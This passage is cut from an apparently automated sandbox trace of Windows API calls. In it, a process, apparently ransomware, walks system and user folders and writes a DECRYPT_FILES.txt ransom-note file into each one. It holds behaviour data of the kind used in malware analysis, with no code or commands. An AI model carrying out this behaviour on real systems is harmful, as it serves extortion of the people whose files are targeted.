(dwNewMode=0x0, lpOldMode=0x1c0ee600) returned 1 [0054.131] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee5c0) returned 1 [0054.131] GetFullPathNameW (in: lpFileName="C:\\Boot\\ko-KR\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x1c0ee140, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ko-KR\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x1f [0054.131] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee620) returned 1 [0054.131] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\DECRYPT_FILES.txt" (normalized: "c:\\boot\\ko-kr\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x408 [0054.131] GetFileType (hFile=0x408) returned 0x1 [0054.131] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee590) returned 1 [0054.131] GetFileType (hFile=0x408) returned 0x1 [0054.132] WriteFile (in: hFile=0x408, lpBuffer=0x21ce8a8*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x1c0ee668, lpOverlapped=0x0 | out: lpBuffer=0x21ce8a8*, lpNumberOfBytesWritten=0x1c0ee668*=0x9d5, lpOverlapped=0x0) returned 1 [0054.132] CloseHandle (hObject=0x408) returned 1 [0054.133] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee6b0) returned 1 [0054.133] GetFullPathNameW (in: lpFileName="C:\\Documents and Settings", nBufferLength=0x105, lpBuffer=0x1c0ee1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Documents and Settings", lpFilePart=0x0) returned 0x19 [0054.133] GetFullPathNameW (in: lpFileName="C:\\Documents and Settings\\", nBufferLength=0x105, lpBuffer=0x1c0ee140, lpFilePart=0x0 | out: lpBuffer="C:\\Documents and Settings\\", lpFilePart=0x0) returned 0x1a [0054.133] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\*", lpFindFileData=0x1c0ee350 | out: lpFindFileData=0x1c0ee350*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0054.134] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee5e0) returned 1 [0054.136] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee6b0) returned 1 [0054.136] GetFullPathNameW (in: lpFileName="C:\\MSOCache", nBufferLength=0x105, lpBuffer=0x1c0ee1a0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache", lpFilePart=0x0) returned 0xb [0054.136] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\", nBufferLength=0x105, lpBuffer=0x1c0ee140, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\", lpFilePart=0x0) returned 0xc [0054.136] FindFirstFileW (in: lpFileName="C:\\MSOCache\\*", lpFindFileData=0x1c0ee350 | out: lpFindFileData=0x1c0ee350*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0054.137] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.137] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0054.137] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 0 [0054.137] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0054.137] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee600) returned 1 [0054.137] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee5c0) returned 1 [0054.137] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee6b0) returned 1 [0054.137] GetFullPathNameW (in: lpFileName="C:\\MSOCache", nBufferLength=0x105, lpBuffer=0x1c0ee1a0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache", lpFilePart=0x0) returned 0xb [0054.137] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\", nBufferLength=0x105, lpBuffer=0x1c0ee140, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\", lpFilePart=0x0) returned 0xc [0054.137] FindFirstFileW (in: lpFileName="C:\\MSOCache\\*", lpFindFileData=0x1c0ee350 | out: lpFindFileData=0x1c0ee350*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0054.138] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.138] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0054.138] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0054.138] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0054.138] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee600) returned 1 [0054.138] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee5c0) returned 1 [0054.138] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x1c0ee140, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x1d [0054.138] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee620) returned 1 [0054.138] CreateFileW (lpFileName="C:\\MSOCache\\DECRYPT_FILES.txt" (normalized: "c:\\msocache\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x408 [0054.139] GetFileType (hFile=0x408) returned 0x1 [0054.139] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee590) returned 1 [0054.139] GetFileType (hFile=0x408) returned 0x1 [0054.139] WriteFile (in: hFile=0x408, lpBuffer=0x21d33d8*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x1c0ee668, lpOverlapped=0x0 | out: lpBuffer=0x21d33d8*, lpNumberOfBytesWritten=0x1c0ee668*=0x9d5, lpOverlapped=0x0) returned 1 [0054.140] CloseHandle (hObject=0x408) returned 1 [0054.140] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee6b0) returned 1 [0054.140] GetFullPathNameW (in: lpFileName="C:\\PerfLogs", nBufferLength=0x105, lpBuffer=0x1c0ee1a0, lpFilePart=0x0 | out: lpBuffer="C:\\PerfLogs", lpFilePart=0x0) returned 0xb [0054.140] GetFullPathNameW (in: lpFileName="C:\\PerfLogs\\", nBufferLength=0x105, lpBuffer=0x1c0ee140, lpFilePart=0x0 | out: lpBuffer="C:\\PerfLogs\\", lpFilePart=0x0) returned 0xc [0054.140] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\*", lpFindFileData=0x1c0ee350 | out: lpFindFileData=0x1c0ee350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0054.141] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.141] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Admin", cAlternateFileName="")) returned 1 [0054.141] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Admin", cAlternateFileName="")) returned 0 [0054.141] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0054.141] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee600) returned 1 [0054.141] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee5c0) returned 1 [0054.141] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee6b0) returned 1 [0054.141] GetFullPathNameW (in: lpFileName="C:\\PerfLogs", nBufferLength=0x105, lpBuffer=0x1c0ee1a0, lpFilePart=0x0 | out: lpBuffer="C:\\PerfLogs", lpFilePart=0x0) returned 0xb [0054.141] GetFullPathNameW (in: lpFileName="C:\\PerfLogs\\", nBufferLength=0x105, lpBuffer=0x1c0ee140, lpFilePart=0x0 | out: lpBuffer="C:\\PerfLogs\\", lpFilePart=0x0) returned 0xc [0054.141] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\*", lpFindFileData=0x1c0ee350 | out: lpFindFileData=0x1c0ee350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0054.141] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.142] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Admin", cAlternateFileName="")) returned 1 [0054.142] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0054.142] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0054.142] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee600) returned 1 [0054.142] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee5c0) returned 1 [0054.142] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0eddb0) returned 1 [0054.142] GetFullPathNameW (in: lpFileName="C:\\PerfLogs\\Admin", nBufferLength=0x105, lpBuffer=0x1c0ed8a0, lpFilePart=0x0 | out: lpBuffer="C:\\PerfLogs\\Admin", lpFilePart=0x0) returned 0x11 [0054.142] GetFullPathNameW (in: lpFileName="C:\\PerfLogs\\Admin\\", nBufferLength=0x105, lpBuffer=0x1c0ed840, lpFilePart=0x0 | out: lpBuffer="C:\\PerfLogs\\Admin\\", lpFilePart=0x0) returned 0x12 [0054.142] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\*", lpFindFileData=0x1c0eda50 | out: lpFindFileData=0x1c0eda50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0054.142] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.143] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0054.143] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0054.143] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0edd00) returned 1 [0054.143] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0edcc0) returned 1 [0054.143] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0eddb0) returned 1 [0054.143] GetFullPathNameW (in: lpFileName="C:\\PerfLogs\\Admin", nBufferLength=0x105, lpBuffer=0x1c0ed8a0, lpFilePart=0x0 | out: lpBuffer="C:\\PerfLogs\\Admin", lpFilePart=0x0) returned 0x11 [0054.143] GetFullPathNameW (in: lpFileName="C:\\PerfLogs\\Admin\\", nBufferLength=0x105, lpBuffer=0x1c0ed840, lpFilePart=0x0 | out: lpBuffer="C:\\PerfLogs\\Admin\\", lpFilePart=0x0) returned 0x12 [0054.143] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\*", lpFindFileData=0x1c0eda50 | out: lpFindFileData=0x1c0eda50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0054.143] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.143] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0054.143] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0054.144] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0edd00) returned 1 [0054.144] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0edcc0) returned 1 [0054.144] GetFullPathNameW (in: lpFileName="C:\\PerfLogs\\Admin\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x1c0ed840, lpFilePart=0x0 | out: lpBuffer="C:\\PerfLogs\\Admin\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x23 [0054.144] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0edd20) returned 1 [0054.144] CreateFileW (lpFileName="C:\\PerfLogs\\Admin\\DECRYPT_FILES.txt" (normalized: "c:\\perflogs\\admin\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x408 [0054.144] GetFileType (hFile=0x408) returned 0x1 [0054.144] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0edc90) returned 1 [0054.144] GetFileType (hFile=0x408) returned 0x1 [0054.144] WriteFile (in: hFile=0x408, lpBuffer=0x21d7f98*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x1c0edd68, lpOverlapped=0x0 | out: lpBuffer=0x21d7f98*, lpNumberOfBytesWritten=0x1c0edd68*=0x9d5, lpOverlapped=0x0) returned 1 [0054.145] CloseHandle (hObject=0x408) returned 1 [0054.145] GetFullPathNameW (in: lpFileName="C:\\PerfLogs\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x1c0ee140, lpFilePart=0x0 | out: lpBuffer="C:\\PerfLogs\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x1d [0054.145] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee620) returned 1 [0054.145] CreateFileW (lpFileName="C:\\PerfLogs\\DECRYPT_FILES.txt" (normalized: "c:\\perflogs\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x408 [0054.146] GetFileType (hFile=0x408) returned 0x1 [0054.146] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee590) returned 1 [0054.146] GetFileType (hFile=0x408) returned 0x1 [0054.146] WriteFile (in: hFile=0x408, lpBuffer=0x21da670*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x1c0ee668, lpOverlapped=0x0 | out: lpBuffer=0x21da670*, lpNumberOfBytesWritten=0x1c0ee668*=0x9d5, lpOverlapped=0x0) returned 1 [0054.147] CloseHandle (hObject=0x408) returned 1 [0054.148] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee6b0) returned 1 [0054.148] GetFullPathNameW (in: lpFileName="C:\\Users\\Public", nBufferLength=0x105, lpBuffer=0x1c0ee1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public", lpFilePart=0x0) returned 0xf [0054.148] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\", nBufferLength=0x105, lpBuffer=0x1c0ee140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\", lpFilePart=0x0) returned 0x10 [0054.148] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\*", lpFindFileData=0x1c0ee350 | out: lpFindFileData=0x1c0ee350*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0054.148] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.148] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0054.148] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0054.149] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0054.149] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28351f0f, 